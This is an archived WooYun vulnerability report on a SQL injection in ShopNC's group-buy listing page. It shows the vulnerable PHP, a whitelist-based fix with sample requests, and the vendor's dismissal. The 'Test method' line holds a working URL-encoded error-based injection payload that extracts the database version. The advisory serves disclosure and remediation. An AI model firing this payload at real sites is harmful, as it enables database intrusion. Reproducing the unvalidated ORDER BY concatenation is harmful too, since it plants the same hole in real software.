WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
Timeline:
2014-04-06: Details reported to the vendor, awaiting vendor handling
2014-04-08: Vendor actively ignored the vulnerability; details opened to third-party security partners
2014-06-02: Details disclosed to core white hats and relevant domain experts
2014-06-12: Details disclosed to regular white hats
2014-06-22: Details disclosed to intern white hats
2014-07-02: Details disclosed to the public

ShopNc injection vulnerability
Vulnerable code in /control/show_groupby.php (the listing in the original report breaks off inside the switch; the closing braces below only complete the fragment as shown):

```php
public function groupbuy_listOp() {
    $g_cache = ($cache = F('groupbuy')) ? $cache : H('groupbuy', true, 'file');
    // Get the group-buy activity currently in progress
    $template_in_progress = $this->get_groupbuy_template_list('in_progress');
    Tpl::output('groupbuy_template', $template_in_progress[0]);
    // Output the countdown
    $this->output_count_down($template_in_progress[0]['end_time']);
    // Pagination
    $page = new Page();
    $page->setEachNum(9);
    $page->setStyle('admin');
    // Get the list of group-buys currently in progress
    $param = array();
    $param['area_id'] = intval($_GET['groupbuy_area']);
    if (empty($param['area_id'])) {
        if (cookie('groupbuy_area')) {
            $area_array = explode(',', cookie('groupbuy_area'));
            $param['area_id'] = intval($area_array[0]);
        }
    }
    $param['class_id'] = intval($_GET['groupbuy_class']);
    if (intval($_GET['groupbuy_price']) !== 0) {
        $price_range_list = $g_cache['price'];
        foreach ($price_range_list as $price_range) {
            if ($price_range['range_id'] == $_GET['groupbuy_price']) {
                $param['greater_than_groupbuy_price'] = $price_range['range_end'];
                $param['less_than_groupbuy_price'] = $price_range['range_start'];
            }
        }
    }
    $groupbuy_order_key = trim($_GET['groupbuy_order_key']);
    // Read the sort direction from the request: it is only trimmed, never validated
    $groupbuy_order = empty($_GET['groupbuy_order']) ? 'desc' : trim($_GET['groupbuy_order']);
    if (!empty($groupbuy_order_key)) {
        switch ($groupbuy_order_key) {
            case 'price':
                // Concatenated straight into the ORDER BY clause
                $param['order'] = 'state asc,groupbuy_price ' . $groupbuy_order;
                break;
            case 'rebate':
                $param['order'] = 'state asc,rebate ' . $groupbuy_order;
                break;
            case 'sale':
                $param['order'] = 'state asc,buyer_count ' . $groupbuy_order;
                // ... the rest of the function is cut off in the original report
        }
    }
}
```
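The root cause is that `groupbuy_order` is copied into the ORDER BY string after nothing more than `trim()`, so anything other than `asc`/`desc` reaches MySQL. A sort direction and a sort column cannot be bound as prepared-statement parameters, so the fix is to map both through fixed whitelists and never let request input touch the SQL text. The following is an added example written for this page, not ShopNC's own code; the function name `build_groupbuy_order` and the constant `GROUPBUY_ORDER_COLUMNS` are assumptions, while the column names mirror the vulnerable snippet above.

```php
<?php
// Added example (not ShopNC code): build the ORDER BY fragment for the
// group-buy list from whitelists instead of concatenating request input.
// Name and constant are hypothetical; columns follow the snippet above.

// Sort keys the page accepts, mapped to the column each one means.
// Only values taken from this map are ever placed in the SQL string.
const GROUPBUY_ORDER_COLUMNS = array(
    'price'  => 'groupbuy_price',
    'rebate' => 'rebate',
    'sale'   => 'buyer_count',
);

/**
 * Return a safe ORDER BY fragment for the given request values, or null
 * when no (or an unknown) sort key was requested. The key is looked up in
 * the whitelist map and the direction is forced to 'asc' or 'desc', so no
 * byte of $order_key or $order_dir is copied into the returned string.
 */
function build_groupbuy_order($order_key, $order_dir)
{
    $order_key = trim((string) $order_key);
    if ($order_key === '' || !array_key_exists($order_key, GROUPBUY_ORDER_COLUMNS)) {
        return null;
    }
    // Direction: exactly 'asc' or 'desc' (case-insensitive), default 'desc',
    // matching the original default for an empty groupbuy_order.
    $dir = strtolower(trim((string) $order_dir));
    if ($dir !== 'asc' && $dir !== 'desc') {
        $dir = 'desc';
    }
    return 'state asc,' . GROUPBUY_ORDER_COLUMNS[$order_key] . ' ' . $dir;
}

// Constructed sample requests (not captured traffic): a normal sort, a
// direction that is not asc/desc, and a key that is not in the whitelist.
$requests = array(
    array('groupbuy_order_key' => 'price', 'groupbuy_order' => 'asc'),
    array('groupbuy_order_key' => 'price', 'groupbuy_order' => 'not-a-direction'),
    array('groupbuy_order_key' => 'buyer_count', 'groupbuy_order' => 'desc'),
);
foreach ($requests as $req) {
    $clause = build_groupbuy_order($req['groupbuy_order_key'], $req['groupbuy_order']);
    echo var_export($clause, true), "\n";
}
```

In the handler, `$param['order']` would be assigned from `build_groupbuy_order($_GET['groupbuy_order_key'], $_GET['groupbuy_order'])` and left unset when the result is null. The second sample request collapses to the default `desc`, and the third is rejected even though `buyer_count` is a real column, because callers select columns by the public key, not by column name.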
Test method:
http://127.0.0.1/shopnc/index.php?act=show_groupbuy&op=groupbuy_list&id=1&groupbuy_order_key=price&groupbuy_order=%20%20and%20%28select%201%20from%20%20%28select%20count%28*%29,concat%28version%28%29,floor%28rand%280%29*2%29%29x%20from%20%20information_schema.tables%20group%20by%20x%29a%29%20--

Vulnerability proof: Guess.

Hazard rating: no impact (vendor ignored)
Ignored at: 2014-07-02 14:15

Vendor response: Thanks Matt, this vulnerability was already fixed last year; we suggest downloading the latest version from the official site to test.

Fix recommendation: None